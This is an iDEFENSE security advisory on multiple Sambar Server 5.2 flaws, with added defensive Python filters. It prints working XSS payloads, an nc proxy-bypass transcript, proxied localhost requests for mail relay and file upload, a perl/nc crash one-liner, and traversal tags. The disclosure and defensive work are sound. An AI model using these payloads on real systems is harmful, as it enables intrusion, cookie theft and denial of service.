Public Vulnerability Reports

Sambar Server Multiple Vulnerabilities

09.25.03

BACKGROUND

Sambar Technologies Sambar Server is a multi-threaded application server
available on both Windows and Linux platforms. More information is
available at http://www.sambar.com/.

DESCRIPTION

Multiple vulnerabilities have been discovered in Sambar Technologies
Sambar Server, the most severe of which allows remote attackers to
execute arbitrary code under the privileges of the web server and to
utilize affected servers as an open proxy.

**** ISSUE I - Information Disclosure ****

The following default installed scripts can be accessed to glean
information about the Sambar server:

    /cgi-bin/environ.pl
    /cgi-bin/testcgi.exe

**** ISSUE II - Cross-Site Scripting (XSS) ****

The following default installed scripts are vulnerable to cross-site
scripting (XSS) attacks:

    /isapi/testisa.dll?<script>alert(document.URL)</script>
    /cgi-bin/testcgi.exe?<script>alert(document.URL)</script>
    /cgi-bin/environ.pl?<script>alert(document.URL)</script>
    /samples/search.dll?query=<script>alert(document.URL)</script>&logic=AND
    /cgi-bin/mortgage.pl?price="><script>alert(document.URL)</script>
    /samples/ssienv.shtml?<script>alert(document.URL)</script>

The following script also contains an XSS vulnerability, albeit one
exploitable only from localhost:

    /cgi-bin/dumpenv.pl?<script>alert(document.URL)</script>

The E-Mail field of the guestbook script (/cgi-bin/book.pl) contains an
XSS vulnerability. The following is an example of exploit input:

    " ONMOUSEOVER="alert(document.cookie)"

**** ISSUE III - Script Execution Through Special Device Request ****

Sambar server fails to check if Windows special device names such as
con, aux and com1 are requested. This allows an attacker with physical
access to a Sambar server to execute arbitrary code under the privileges
of the web server by generating a request such as:

    POST /cgi-bin/com1.pl HTTP/1.0

The above request will instantiate the Perl interpreter (perl.exe) to
process code from the COM1 port. An attacker can supply code to the
interpreter by connecting to the target system through a null-modem
cable with a terminal application.
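As an added example (not part of the original advisory or of Sambar's code), the following Python check is the kind of ingress validation that closes this issue: it rejects any request path component that Windows would route to a device. The reserved-name list is the standard Windows one; the function names and sample request line are my own.

```python
import re
from urllib.parse import unquote

# Windows reserves these names in every directory. The part of a file name
# before its first '.' is compared case-insensitively, so "com1.pl" or
# "CON.txt" opens the device rather than a file.
_RESERVED_DEVICES = {"CON", "PRN", "AUX", "NUL"} \
    | {f"COM{i}" for i in range(1, 10)} \
    | {f"LPT{i}" for i in range(1, 10)}

def device_name_of(component: str) -> str:
    """Return the reserved device a single path component maps to, or ''."""
    # Windows ignores trailing spaces and dots, then takes the stem before the first '.'
    stem = component.rstrip(" .").split(".", 1)[0].rstrip(" ").upper()
    return stem if stem in _RESERVED_DEVICES else ""

def reserved_device_in_path(url_path: str) -> str:
    """Return the first reserved device name in a request path, or ''.

    The query string is dropped, percent-encoding is decoded and both '/'
    and '\\' are treated as separators, mirroring what a server does before
    the filesystem sees the name.
    """
    decoded = unquote(url_path.split("?", 1)[0])
    for component in re.split(r"[\\/]+", decoded):
        if component:
            name = device_name_of(component)
            if name:
                return name
    return ""

def should_reject(request_line: str) -> bool:
    """Check a full request line such as 'POST /cgi-bin/com1.pl HTTP/1.0'."""
    parts = request_line.split()
    return len(parts) >= 2 and bool(reserved_device_in_path(parts[1]))
```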

**** ISSUE IV - Unrestricted Proxy Access ****

Sambar server by default allows proxy access to localhost. A bug in the
processing of HTTP/1.1 requests allows an attacker to bypass this
restriction thereby opening up the proxy server to any remote address.
The following example demonstrates how this vulnerability is exploited:

    $ nc 10.0.0.22 80
    GET / HTTP/1.1

    HTTP/1.1 200 OK
    Date: Tue, 10 Feb 2003 17:06:23 GMT
    Server: SAMBAR 5.2
    MIME-version: 1.0
    Transfer-Encoding: chunked
    Keep-Alive: max=30, timeout=5
    Connection: Keep-Alive
    Content-type: text/html

    [ output trimmed for sake of brevity ]

    GET http://www.example.com HTTP/1.1
    Host: example.com

    HTTP/1.1 200 OK
    Date: Tue, 10 Feb 2003 17:26:10 GMT
    Server: Apache/1.3.27 (Unix) (Red-Hat/Linux)
    Last-Modified: Wed, 08 Jan 2003 23:11:55 GMT
    ETag: "3f80f-1b6-3e1cb03b"
    Accept-Ranges: bytes
    Content-Length: 438
    Connection: close
    Content-Type: text/html

    <HTML>
    <HEAD>
    <TITLE>Example Web Page</TITLE>
    </HEAD>
    <body>
    <p>You have reached this web page by typing "example.com",
    "example.net", or "example.org" into your web browser.</p>
    [ output trimmed for sake of brevity ]
    </BODY>
    </HTML>

**** ISSUE V - Mail Relaying ****

A default installation of Sambar server includes a sample mail relaying
script, mailit.pl. The script is intended for demo purposes and as such
restricts access to localhost only. However, an attacker can utilize the
above-described (IV) proxy vulnerability to generate the following
request:

    POST http://127.0.0.1/cgi-bin/mailit.pl HTTP/1.0

This request causes mailit.pl to be executed with a $REMOTE_ADDR of
127.0.0.1, thereby bypassing the localhost-only restriction.

**** ISSUE VI - Arbitrary File Access ****

Building upon the proxy (IV) and mail relaying (V) vulnerabilities it is
possible for an attacker to relay mail with an attached file. While the
script takes measures to guard against directory traversal attacks in
file inclusion it does not address them all. The following methods can
be used to include an arbitrary system file for attachment:

    - There are no checks for : or \ allowing an attacker to specify
      an absolute path for file inclusion.
    - There are no checks for % allowing an attacker to pass a file name
      through the %QUERY_STRING% variable.
    - The mailit.pl script invokes mailit.exe through the system() call.
      Because the character is not filtered it can be used, in effect, to
      comment out a " character and add arguments to the system() call.

Any system file can be retrieved using this method, including the server
configuration and password files. Retrieved password files can be
decoded with a utility available on the following website:

    http://www.security.nnov.ru/advisories/sambarpass.asp

**** ISSUE VII - Arbitrary File Upload ****

Sambar server allows administrators to upload files to the server's docs
directory via the HTTP PUT directive. This action is restricted to
localhost users but can be bypassed by remote attackers through the
exploitation of the proxy vulnerability (IV).

**** ISSUE VIII - Denial of Service ****

Sambar server crashes when the following request is made from localhost
(a trailing space at the end of the request is required):

    GET http://127.0.0.1/

This vulnerability can be remotely exploited in combination with the
proxy vulnerability (IV). The following is an example attack that will
crash the affected Sambar server running at 10.0.0.22 with the proxy
service enabled (default) and restricted to localhost only (also
default):

    $ perl -e 'print "GET / HTTP/1.1\r\n\r\nGET http://127.0.0.1/ \r\n\r\n"' | nc 10.0.0.22 80

**** ISSUE IX - Arbitrary Code Execution ****

Sambar server supports server side scripting languages through STM
files. The following example tag would execute environ.pl with arguments
'foo' set to '111' and 'bar' set to '222'.

    <RCCenviron.pl foo=111 bar=222>

STM files allow for directory traversal modifiers in the specification
of script names. The following tag for example would load the same
script if it were to be moved to ../docs/samples:

    <RCC../docs/samples/environ.pl foo=111 bar=222>

Successful exploitation of this vulnerability in combination with the
proxy (IV) and arbitrary file upload (VII) vulnerabilities allows an
attacker to remotely execute arbitrary commands on an affected system
thereby resulting in a system compromise under the privileges of the web
server.
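The file-inclusion bypasses in Issue VI and the traversal in RCC script names in Issue IX share one root cause: a blocklist of bad characters. As an added example (my code, not Sambar's or the advisory's), the Python below shows the allowlist alternative, with the base directories and file names being constructed samples:

```python
import posixpath
import re
from typing import Optional

# Allowlist for a bare file name: a letter or digit, then letters, digits,
# '.', '_' or '-'. Everything the advisory lists as unfiltered (':', '\\',
# '%', '"') and any separator or '..' fails this test outright.
_SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")

def resolve_under(base_dir: str, user_name: str) -> Optional[str]:
    """Return the normalised path of user_name inside base_dir, or None.

    Two independent checks: the name must pass the allowlist, and the joined
    path must still lie under base_dir after normalisation. Either alone
    rejects the inputs below; together they survive a later loosening of the
    regex. A production version should also resolve symlinks first.
    """
    if not _SAFE_NAME.fullmatch(user_name):
        return None
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, user_name))
    if posixpath.commonpath([base, candidate]) != base:
        return None
    return candidate

# Constructed inputs modelled on the bypass shapes described in Issues VI and IX.
REJECTED_EXAMPLES = [
    "../config/passwd",            # classic traversal
    r"..\..\config\passwd",        # backslash separator
    r"C:\sambar\config\passwd",    # drive-letter absolute path
    "%QUERY_STRING%",              # environment-variable expansion
    'report.txt" extra',           # quote breaking out of a system() string
    "../docs/samples/environ.pl",  # RCC script name traversal
    ".htaccess",                   # leading dot
]
```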

ANALYSIS

Any remote attacker with access to an affected Sambar server can exploit
the above-described vulnerabilities. Successful exploitation could lead
to system compromise in a default install of Sambar server. An attacker
can exploit the remote proxy vulnerability to attack a third party on
behalf of the affected Sambar server.

According to the Netcraft Web Server Survey there are currently
approximately 6,400 Sambar driven web servers on the net.

DETECTION

iDEFENSE has confirmed the existence of these vulnerabilities in Sambar
version 5.2. It is reported and suspected that older versions are
affected as well.

WORKAROUND

Administrators should remove all default-installed scripts. This will
resolve the XSS and information disclosure vulnerabilities as well as
preventing remote attackers from exploiting the mailit.pl script to
relay mail, access files, and upload files.

Administrators that do not require the proxy service can disable it
thereby preventing all remote exploitation that depends on the proxy
vulnerability (IV). If the proxy service is required an ingress
application level filter can be used to deny HTTP/1.1 requests as the
vulnerability does not affect requests for HTTP/1.0.
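As an added example (not from the advisory or from Sambar), this Python request-line filter implements the ingress check described above for the proxy issue (IV) and the chained attacks that depend on it (V, VII, VIII): absolute-form request targets are denied outright, loopback targets are reported separately, and the coarser "deny HTTP/1.1" workaround is an option. The sample request lines are constructed from the shapes quoted in this advisory.

```python
import re
from urllib.parse import urlsplit

# Request-line grammar: METHOD SP request-target SP HTTP/major.minor
_REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/(\d)\.(\d)$")

def filter_request_line(line: str, deny_http11: bool = False) -> str:
    """Decide on one request line: 'allow' or 'deny: <reason>'.

    Absolute-form targets (proxy requests) are always denied by this
    filter; deny_http11 mirrors the advisory's coarser workaround of
    refusing every HTTP/1.1 request.
    """
    m = _REQUEST_LINE.match(line.rstrip("\r\n"))
    if not m:
        # Covers the HTTP/0.9-style "GET http://127.0.0.1/ " crash request.
        return "deny: malformed request line"
    method, target, major, minor = m.groups()
    if not target.startswith("/"):
        parts = urlsplit(target)
        if parts.scheme and parts.netloc:
            host = (parts.hostname or "").lower()
            if host == "localhost" or host.startswith("127."):
                return "deny: proxy request to loopback"
            return "deny: proxy request to external host"
        return "deny: unrecognised request target"
    if deny_http11 and (major, minor) == ("1", "1"):
        return "deny: HTTP/1.1 refused by policy"
    return "allow"

# Constructed sample traffic modelled on the request shapes in this advisory.
SAMPLE_LINES = [
    "GET / HTTP/1.1",
    "GET http://www.example.com HTTP/1.1",
    "POST http://127.0.0.1/cgi-bin/mailit.pl HTTP/1.0",
    "PUT http://localhost/docs/upload.stm HTTP/1.0",
    "GET http://127.0.0.1/ ",
    "GET /cgi-bin/environ.pl HTTP/1.0",
]

def audit(lines, deny_http11=False):
    """Return (request line, decision) pairs for a batch of request lines."""
    return [(line, filter_request_line(line, deny_http11)) for line in lines]
```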

VENDOR RESPONSE

Multiple Vulnerabilities from idefense.com
(http://www.sambar.com/security.htm)

CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

CREDIT

3APA3A (3apa3a@security.nnov.ru) is credited with this discovery.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

LEGAL NOTICES

Copyright © 2004 Verisign, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.